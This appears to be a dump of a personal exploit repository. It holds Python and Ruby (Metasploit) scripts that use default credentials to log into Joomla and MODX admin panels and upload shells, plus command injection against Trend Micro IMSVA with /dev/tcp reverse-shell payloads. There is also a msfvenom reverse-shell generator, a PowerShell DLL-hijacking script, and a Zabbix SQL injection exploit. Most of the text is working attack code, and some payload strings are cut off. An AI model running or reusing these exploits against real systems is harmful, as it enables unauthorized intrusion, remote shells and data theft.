10 | # Tested also on: 3.7.x
11 |
12 |
13 | import requests
14 | import re
15 |
16 | target = raw_input("[+] Hostname >> ")
17 |
18 | print '[+] Checking: ' + str(target)
19 |
20 | # initGET
21 | session = requests.session()
22 | initlink = target + '/administrator/index.php'
23 |
24 | initsend = session.get(initlink)
25 | initresp = initsend.text
26 |
27 | find_token = re.compile('')
28 | found_token = re.search(find_token, initresp)
29 |
30 | if found_token:
31 | initToken = found_token.group(1)
32 | print '[+] Found init token: ' + initToken
33 |
34 | print '[+] Preparing login request'
35 | data_login = {
36 | 'username':'user',
37 | 'passwd':'bitnami',
38 | 'lang':'',
39 | 'option':'com_login',
40 | 'task':'login',
41 | 'return':'aW5kZXgucGhw',
42 | initToken:'1'
43 | }
44 | data_link = initlink
45 | doLogin = session.post(data_link, data=data_login)
46 | loginResp = doLogin.text
47 |
48 | print '[+] At this stage we should be logged-in as an admin :)'
49 |
50 | uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
51 | filename = 'jsstrings.php'
52 | print '[+] File to change: ' + str(filename)
53 |
54 | getnewtoken = session.get(uplink)
55 | getresptoken = getnewtoken.text
56 |
57 | newToken = re.compile('')
58 | newFound = re.search(newToken, getresptoken)
59 |
60 | if newFound:
61 | newOneTok = newFound.group(1)
62 | print '[+] Grabbing new token from logged-in user: ' + newOneTok
63 |
64 | getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
65 | getjsreq = session.get(getjs)
66 | getjsresp = getjsreq.text
67 |
68 | # print getjsresp
69 | print '[+] Shellname: ' + filename
70 | shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA='
71 | shdata_up = {
72 | 'jform[source]':' ")
14 |
15 | print '[+] Preparing tests for ' + str(target)
16 |
17 | session = requests.session()
18 | sesslink = target + '/manager/'
19 |
20 | print '[+] Preparing login request...'
21 |
22 | data_login = {
23 | 'login_context':'mgr',
24 | 'modahsh':'',
25 | 'returnUrl':'/manager/',
26 | 'username':'user',
27 | 'password':'bitnami',
28 | 'login':'1'
29 | }
30 | data_link = sesslink
31 | doLogin = session.post(data_link, data=data_login)
32 | loginResp = doLogin.text
33 |
34 | if 'Logout' in loginResp:
35 | print '[+] We are logged in ;]'
36 |
37 | # grab HTTP_MODAUTH to build params for shelluprequest
38 | modlink = target + '/manager/?a=media/browser'
39 | getmod = session.get(modlink)
40 | getmodresp = getmod.text
41 |
42 | modfind = re.compile('auth:"(.*?)"')
43 | modfound = re.search(modfind, loginResp)
44 |
45 | if modfound:
46 | token = modfound.group(1)
47 |
48 | print '[+] Found HTTP_MODAUTH token:', token
49 |
50 | # preparing shellup req
51 | shell_data = {
52 | 'action':'browser/file/update',
53 | 'HTTP_MODAUTH':token,
54 | 'wctx':'',
55 | 'source':'1',
56 | 'file':'index.php',
57 | 'content':'')
44 | found = re.search(findit, resp2)
45 |
46 | if found:
47 | gottoken = found.group(1)
48 |
49 | print '[+] going... d0wn?'
50 |
51 | reverse_this = {
52 | '__FORM_TOKEN':gottoken,
53 | 'file':payloadfp,
54 | 'install':'Install'
55 | }
56 |
57 | print 'h4p+sh...!\n\tH@PT$h...! ;D\n'
58 | req3 = sess.post(target2, data=reverse_this,files=payloadfp)
59 | #print req3.text
60 |
61 | print '[+] done.'
62 |
63 |
64 |
65 | #
66 |
67 |
--------------------------------------------------------------------------------
/trend_micro_imsva_exec_wizard-v2.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | class MetasploitModule < Msf::Exploit::Remote
7 | Rank = ExcellentRanking
8 |
9 | include Msf::Exploit::Remote::HttpClient
10 |
11 | def initialize(info={})
12 | super(update_info(info,
13 | 'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
14 | 'Description' => %q{
15 | This module exploits a command injection vulnerability in the Trend Micro
16 | IMSVA product. An authenticated user can execute a terminal command under
17 | the context of the web server user which is root. Besides, default installation
18 | of IMSVA comes with a default administrator credentials.
19 |
20 | WizardSetting_sys.imss endpoint takes several user inputs and performs LAN settings.
21 | After that it use them as argument of predefined operating system command
22 | without proper sanitation. It's possible to inject arbitrary commands into it.
23 |
24 | InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
25 | },
26 | 'License' => MSF_LICENSE,
27 | 'Author' =>
28 | [
29 | 'Cody Sixteen <610code\at\gmail.com>', # found bug, rewrite poc
30 | 'Mehmet Ince ' # msf module based on pentest.blog
31 | ],
32 | 'References' =>
33 | [
34 | ['CVE', '2017-not-yet'],
35 | ['URL', 'https://code610.blogspot.com/2017/08/rce-in-trend-micro-imsva-91.html'],
36 | ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
37 | ],
38 | 'Privileged' => true,
39 | 'Payload' =>
40 | {
41 | 'Space' => 1024,
42 | 'DisableNops' => true,
43 | 'BadChars' => "\x2f\x22"
44 | },
45 | 'DefaultOptions' =>
46 | {
47 | 'SSL' => true,
48 | 'payload' => 'python/meterpreter/reverse_tcp',
49 | },
50 | 'Platform' => [''],
51 | 'Arch' => ARCH_PYTHON,
52 | 'Targets' => [ ['Automatic', {}] ],
53 | 'DisclosureDate' => 'Aug 18 2017',
54 | 'DefaultTarget' => 0
55 | ))
56 |
57 | register_options(
58 | [
59 | OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
60 | OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
61 | OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
62 | Opt::RPORT(8445)
63 | ]
64 | )
65 | end
66 |
67 | def login
68 |
69 | user = datastore['USERNAME']
70 | pass = datastore['PASSWORD']
71 |
72 | print_status("Attempting to login with #{user}:#{pass}")
73 |
74 | res = send_request_cgi({
75 | 'method' => 'POST',
76 | 'uri' => normalize_uri(target_uri.path, 'login.imss'),
77 | 'vars_post' => {
78 | 'userid' => user,
79 | 'pwdfake' => Rex::Text::encode_base64(pass)
80 | }
81 | })
82 |
83 | if res && res.body.include?("The user name or password you entered is invalid")
84 | fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
85 | end
86 |
87 | cookie = res.get_cookies
88 | if res.code == 302 && cookie.include?("JSESSIONID")
89 | jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
90 | print_good("Authenticated as #{user}:#{pass}")
91 | return jsessionid
92 | end
93 |
94 | nil
95 | end
96 |
97 | def exploit
98 |
99 | jsessionid = login
100 |
101 | unless jsessionid
102 | fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
103 | end
104 |
105 | # Somehow java stores last visited url on session like viewstate!
106 | # Visit form before submitting it. Otherwise, it will cause a crash.
107 |
108 | res = send_request_cgi({
109 | 'method' => 'GET',
110 | 'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss?direct=next'),
111 | 'cookie' => "JSESSIONID=#{jsessionid}"
112 | })
113 |
114 | if !res
115 | fail_with(Failure::Unknown, 'Unable to visit WizardSetting_sys.imss')
116 | end
117 |
118 | print_status("Delivering payload...")
119 |
120 | # payload ; thanks goes to: bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
121 | # remember to set your listening nc in 2nd window
122 | cmd = "eth0'; 0<&196;exec 196<>/dev/tcp/192.168.56.106/9999;sh <&196 >&196 2>&196 ;#"
123 |
124 | # print_status("payload: #{cmd}") ;]
125 | payl = cmd.encode
126 |
127 | # go.
128 | res = send_request_cgi({
129 | 'method' => 'POST',
130 | 'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss'),
131 | 'cookie' => "JSESSIONID=#{jsessionid}",
132 | 'vars_get' => {
133 | 'direct' => 'next'
134 | },
135 | 'vars_post' => {
136 | 'time_distance' => '0',
137 | 'sys_ipv4_addr_eth0' => '192.168.56.34',
138 | 'sys_ipv4_mask_eth0' => '255.255.255.0',
139 | 'sys_desname' => "#{cmd}",
140 | 'sys_hostname' => 'trend.me',
141 | 'sys_ipv4_gateway' => '192.168.56.1',
142 | 'sys_ipv4_pri_dns' => '192.168.56.1',
143 | 'sys_ipv4_sec_dns' => '',
144 | 'sys_tz_cont' => 'America',
145 | 'sys_tz_regn' => 'United+States',
146 | 'sys_tz_city' => 'New_York',
147 | }
148 | })
149 | print_status("Payload finished.")
150 | end
151 |
152 | end
153 |
--------------------------------------------------------------------------------
/trend_micro_imsva_exec_wizard.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | class MetasploitModule < Msf::Exploit::Remote
7 | Rank = ExcellentRanking
8 |
9 | include Msf::Exploit::Remote::HttpClient
10 |
11 | def initialize(info={})
12 | super(update_info(info,
13 | 'Name' => 'Trend Micro InterScan Messaging Security (Wizard) Remote Code Execution',
14 | 'Description' => %q{
15 | This module exploits a command injection vulnerability in the Trend Micro
16 | IMSVA product. An authenticated user can execute a terminal command under
17 | the context of the web server user which is root. Besides, default installation
18 | of IMSVA comes with a default administrator credentials.
19 |
20 | WizardSetting_sys.imss endpoint takes several user inputs and performs LAN settings.
21 | After that it use them as argument of predefined operating system command
22 | without proper sanitation. It's possible to inject arbitrary commands into it.
23 |
24 | InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
25 | },
26 | 'License' => MSF_LICENSE,
27 | 'Author' =>
28 | [
29 | 'Cody Sixteen <610code\at\gmail.com>', # found bug, rewrite poc
30 | 'Mehmet Ince ' # msf module based on pentest.blog
31 | ],
32 | 'References' =>
33 | [
34 | ['CVE', '2017-xxx-xxxx'],
35 | ['URL', 'https://code610.blogspot.com/2017/08/rce-in-trend-micro-imsva-91.html'],
36 | ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
37 | ],
38 | 'Privileged' => true,
39 | 'Payload' =>
40 | {
41 | 'Space' => 1024,
42 | 'DisableNops' => true,
43 | 'BadChars' => "\x2f\x22"
44 | },
45 | 'DefaultOptions' =>
46 | {
47 | 'SSL' => true,
48 | 'payload' => 'python/meterpreter/reverse_tcp',
49 | },
50 | 'Platform' => ['python'],
51 | 'Arch' => ARCH_PYTHON,
52 | 'Targets' => [ ['Automatic', {}] ],
53 | 'DisclosureDate' => 'Aug 18 2017',
54 | 'DefaultTarget' => 0
55 | ))
56 |
57 | register_options(
58 | [
59 | OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
60 | OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
61 | OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
62 | Opt::RPORT(8445)
63 | ]
64 | )
65 | end
66 |
67 | def login
68 |
69 | user = datastore['USERNAME']
70 | pass = datastore['PASSWORD']
71 |
72 | print_status("Attempting to login with #{user}:#{pass}")
73 |
74 | res = send_request_cgi({
75 | 'method' => 'POST',
76 | 'uri' => normalize_uri(target_uri.path, 'login.imss'),
77 | 'vars_post' => {
78 | 'userid' => user,
79 | 'pwdfake' => Rex::Text::encode_base64(pass)
80 | }
81 | })
82 |
83 | if res && res.body.include?("The user name or password you entered is invalid")
84 | fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
85 | end
86 |
87 | cookie = res.get_cookies
88 | if res.code == 302 && cookie.include?("JSESSIONID")
89 | jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
90 | print_good("Authenticated as #{user}:#{pass}")
91 | return jsessionid
92 | end
93 |
94 | nil
95 | end
96 |
97 | def exploit
98 |
99 | jsessionid = login
100 |
101 | unless jsessionid
102 | fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
103 | end
104 |
105 | # Somehow java stores last visited url on session like viewstate!
106 | # Visit form before submitting it. Otherwise, it will cause a crash.
107 |
108 | res = send_request_cgi({
109 | 'method' => 'GET',
110 | 'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss?direct=next'),
111 | 'cookie' => "JSESSIONID=#{jsessionid}"
112 | })
113 |
114 | if !res
115 | fail_with(Failure::Unknown, 'Unable to visit WizardSetting_sys.imss')
116 | end
117 |
118 | print_status("Delivering payload...")
119 |
120 | # payload
121 | cmd = "eth0';/bin/date>/tmp/2hi.txt;#"
122 | payl = cmd.encode
123 |
124 | res = send_request_cgi({
125 | 'method' => 'POST',
126 | 'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss'),
127 | 'cookie' => "JSESSIONID=#{jsessionid}",
128 | 'vars_get' => {
129 | 'direct' => 'next'
130 | },
131 | 'vars_post' => {
132 | 'time_distance' => '0',
133 | 'sys_ipv4_addr_eth0' => '192.168.56.34',
134 | 'sys_ipv4_mask_eth0' => '255.255.255.0',
135 | 'sys_desname' => payl,
136 | 'sys_hostname' => 'trend.me',
137 | 'sys_ipv4_gateway' => '192.168.56.1',
138 | 'sys_ipv4_pri_dns' => '192.168.56.1',
139 | 'sys_ipv4_sec_dns' => '',
140 | 'sys_tz_cont' => 'America',
141 | 'sys_tz_regn' => 'United+States',
142 | 'sys_tz_city' => 'New_York',
143 | }
144 | })
145 | print_status("Payload finished.")
146 | end
147 |
148 | end
149 |
--------------------------------------------------------------------------------
/trendmicr00t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # poc based on http://code610.blogspot.com/2017/08/metasploit-module-for-rce-in-trend.html
3 | # 25.08.2018
4 | #
5 | import requests, sys
6 | from urllib import urlencode
7 | import os
8 |
9 | target = 'https://192.168.56.34:8445'
10 | print '[+] target:', target
11 |
12 | # remember to set nc -lvvp 4444 on 2nd terminal
13 |
14 | s = requests.Session()
15 | s.verify=False
16 |
17 | login_url = target + '/login.imss'
18 | login_data = {
19 | 'userid':'admin',
20 | 'pwdfake':'imsva'.encode('base64')
21 | }
22 |
23 | resp = s.post(login_url, data=login_data)
24 |
25 | #token_place = resp.text.find(';jsessionid=') + 13
26 | #token = resp.text[token_place:token_place + 32]
27 |
28 |
29 | auth_cookie = resp.history[0].cookies.get('JSESSIONID')
30 | print '[+] logged-in cookie:', auth_cookie
31 | #print resp.text
32 |
33 |
34 | myreq = s.get(target + '/WizardSetting_sys.imss?direct=next')
35 | testresp = myreq.text
36 |
37 | print '[+] test GET:',myreq.status_code
38 |
39 | #
40 | cookies = {'JSESSIONID': auth_cookie}
41 | headers = {'Referer':'https://192.168.56.34:8445/WizardSetting_0.imss?direct=next' }
42 | #payload = "AA'; bash -i >& /dev/tcp/192.168.56.106/4444 0>&1 ;#"
43 | payload = "AA'; 0<&196;exec 196<>/dev/tcp/192.168.56.106/4444; sh <&196 >&196 2>&196 ;#"
44 | myreq_data = {
45 | 'time_distance' : '0',
46 | 'sys_ipv4_addr_eth0' : '192.168.56.34',
47 | 'sys_ipv4_mask_eth0' : '255.255.255.0',
48 | 'sys_desname': payload ,
49 | 'sys_hostname' : 'trend.me',
50 | 'sys_ipv4_gateway' : '192.168.56.1',
51 | 'sys_ipv4_pri_dns' : '192.168.56.1',
52 | 'sys_ipv4_sec_dns' : '',
53 | 'sys_tz_cont' : 'America',
54 | 'sys_tz_regn' : 'United+States',
55 | 'sys_tz_city' : 'New_York',
56 |
57 | }
58 | #myreq_data = urlencode(myreq_data)
59 |
60 | myreq = s.post(target + '/WizardSetting_sys.imss?direct=next', data=myreq_data, headers=headers, cookies=cookies) # ,allow_redirects=True)
61 |
62 | print myreq_data
63 | #print myreq.text
64 |
--------------------------------------------------------------------------------
/upgweb-elf-foscam.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/upgweb-elf-foscam.zip
--------------------------------------------------------------------------------
/venome.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # venome.sh -- script to generate win/lin revshell to 'my Kali box'
4 | # based on MSF Venom (default install on Kali 2)
5 | #
6 |
7 | # 14.08.2018 @ 19:12
8 |
9 | # some defines first
10 | KALI=192.168.1.183
11 | KALIPORT=4444
12 | FTYPOUT="py"
13 |
14 | ####
15 |
16 | echo ""
17 | echo "[+] \$\$\$ sh0w m3 th3 m0n3y \$\$\$"
18 | echo ""
19 |
20 | echo " >> choose your destiny (1/2/3):"
21 | echo " 1. goto windows 2. goto linux"
22 | echo " 3. php 4. war (jsp)"
23 | echo " 5. dll 6. nodejs"
24 | echo ""
25 | read letsgoto
26 |
27 | case "$letsgoto" in
28 | "1") echo "[+] preparing Windows revshell for Kali ($KALI on port $KALIPORT):"
29 | msfvenom -p windows/shell_reverse_tcp LHOST=$KALI LPORT=$KALIPORT EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" > winshell.py 2>&1
30 | echo "[+] Windows reverse shell should be ready here:"
31 | ls -la winshell.py
32 | echo "[+] we're done."
33 |
34 | ;;
35 |
36 |
37 | "2") echo "[+] preparing Linux revshell for Kali ($KALI on port $KALIPORT):"
38 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.183 LPORT=4444 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" > linshell.py 2>&1
39 | echo "[+] Linux reverse shell should be ready here:"
40 | ls -la linshell.py
41 | echo "[+] we're done."
42 |
43 | ;;
44 |
45 |
46 | "3") echo "[+] preparing PHP revshell for Kali ($KALI on port $KALIPORT):"
47 |
48 | msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f raw >> phpshell-a.php 2>&1
49 | echo "GIF98" > phpshell.php
50 | tail -n 2 phpshell-a.php >> phpshell.php
51 | echo "[+] PHP reverse shell should be ready here:"
52 | rm phpshell-a.php
53 | ls -la phpshell.php
54 | echo "[+] we're done."
55 |
56 | ;;
57 |
58 |
59 | "4") echo "[+] preparing WAR (with JSP) revshell for Kali ($KALI on port $KALIPORT):"
60 |
61 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f raw > jspshell.war 2>&1
62 | echo "[+] WAR (JSP) reverse shell should be ready here:"
63 | ls -la jspshell.war
64 | echo "[+] we're done."
65 |
66 | ;;
67 |
68 | "5") echo "[+] preparing DLL revshell for Kali ($KALI on port $KALIPORT):"
69 |
70 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f dll > h00ker.dll 2>&1
71 | echo "[+] DLL reverse shell should be ready here:"
72 | ls -la h00ker.dll
73 | echo "[+] we're done."
74 | ;;
75 |
76 | "6") echo "[+] preparing NodeJS revshell for Kali ($KALI on port $KALIPORT):"
77 |
78 | msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.183 LPORT=4444 -f raw > naughty.js 2>&1
79 | echo "[+] naughty.js reverse shell should be ready here:"
80 | ls -la naughty.js
81 | echo "[+] we're done."
82 |
83 |
84 | ;;
85 |
86 |
87 | *) echo "[-] nononono! :<"
88 | echo ""
89 |
90 | esac # newton
91 |
92 | echo "[+] thank you, bye!"
93 | # o/
94 |
--------------------------------------------------------------------------------
/vlc-2.2.4-pocs-01.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/vlc-2.2.4-pocs-01.zip
--------------------------------------------------------------------------------
/vlc-304-probably02-0x918f89cc.0x918f89cc.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/vlc-304-probably02-0x918f89cc.0x918f89cc.zip
--------------------------------------------------------------------------------
/vlc-304-probablynot01-0xada66f78.0xd23faa61.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/vlc-304-probablynot01-0xada66f78.0xd23faa61.zip
--------------------------------------------------------------------------------
/wh0care.ps1:
--------------------------------------------------------------------------------
1 | # -------------------------------------------------------------------------------
2 | #
3 | # wh0care.ps1 -- small Powershell script to automate our 'simple DLL injections'
4 | #
5 | # refs: https://code610.blogspot.com/2018/09/dll-injection-part-1.html
6 | # https://code610.blogspot.com/2018/08/venomesh-simple-msfvenom-generator.html
7 | #
8 | # 09.09.2018
9 | #
10 | # -------------------------------------------------------------------------------
11 |
12 | # defines:
13 | param([string]$targetDir) # to set argv[1] as our 'targetDir'
14 | $evilDll="c:\\Pliki\\h00ker.dll"
15 | $logMeHere="C:\\Pliki\\oko1.log"
16 |
17 | # Get perms recursively from target path and save it to log1.file:
18 | #
19 | Write-Host "[+] Checking perms for target dir: " $targetDir
20 | Get-ChildItem -Recurse $targetDir | Get-Acl > $logMeHere
21 | Write-Host "[+] Done. Checking files..."
22 |
23 | # grep "Modif" for our log1.file;
24 | # save the output to $tmpvar;
25 | # grep it again to get splitted filename.dll:
26 | #
27 | $tmpvar=(Get-Content $logMeHere ) | Select-String -Pattern ".dll" | Select-String -Pattern "Modif"
28 | $trydll=($tmpvar -Split(" ") | select-string -pattern ".dll")
29 | Write-Host "[+] Got filename:" $trydll
30 |
31 |
32 | # now we can replace targetDll with our super evil.dll
33 | #
34 | Write-Host "[+] ...but trying evil 0ne: " $evilDll
35 | #
36 | # Rename
37 | Write-Host "[+] Here we go: " $targetDir\$trydll
38 | Copy-Item $evilDll -Destination $targetDir\$trydll
39 |
40 | write-host "[+] Dest app should be ready to restart. Check it!"
41 |
42 | # eof
43 | # o/
44 |
45 |
--------------------------------------------------------------------------------
/windbg.script.txt:
--------------------------------------------------------------------------------
1 | .echo ""
2 | .logopen /t c:\target.log
3 | .echo "loaded"
4 | g
5 | g
6 | g
7 | r
8 | .dump /u c:\target.dmp
9 | .echo "finished"
10 | .logclose
11 | .restart /f
--------------------------------------------------------------------------------
/zabbisql.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # CVE-2016-10134
3 |
4 | import requests
5 | import re
6 | import sys
7 |
8 | target = sys.argv[1]
9 | dashboard = '/zabbix/dashboard.php'
10 | latest = '/zabbix/latest.php'
11 |
12 | print '[+] checking target:', target
13 |
14 | sess = requests.Session()
15 | resp = sess.get(target+dashboard, verify=False)
16 |
17 | if not 'sid=' in resp.text:
18 | print '[-] sid not found ;[ -- break'
19 |
20 | gotsid = re.search('reconnect=1&sid=(.*?)"', resp.text)
21 | if gotsid:
22 | print '[+] gotsid: ', gotsid.group(1)
23 |
24 | # payload = '6666+or+updatexml(1,concat(0x23,(select+user()),0x23),1)+or+1=1)%23'
25 | payload = '6666 or updatexml(1,concat(0x23,(select version()),0x23),1) or 1=1)#'
26 | params = {
27 | 'output': 'ajax',
28 | 'sid': gotsid.group(1),
29 | 'favobj': 'toggle',
30 | 'toggle_open_state': 1,
31 | 'toggle_ids[]': payload
32 | }
33 |
34 | execsqli = sess.get(target + latest, params=params, verify=False)
35 | #print '[+] response:\n', execsqli.text
36 | checkresp = execsqli.text.splitlines()
37 | for l in checkresp:
38 | ifanswer = re.compile('error: \'#(.*?)#\']<')
39 | gotanswer = re.search(ifanswer, l)
40 |
41 | if gotanswer:
42 | print '[+] Resp: version(): %s' % ( gotanswer.group(1) )
43 |
44 | # more: code610.blogspot.com
--------------------------------------------------------------------------------
/zenload4patreons.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/zenload4patreons.zip
--------------------------------------------------------------------------------
|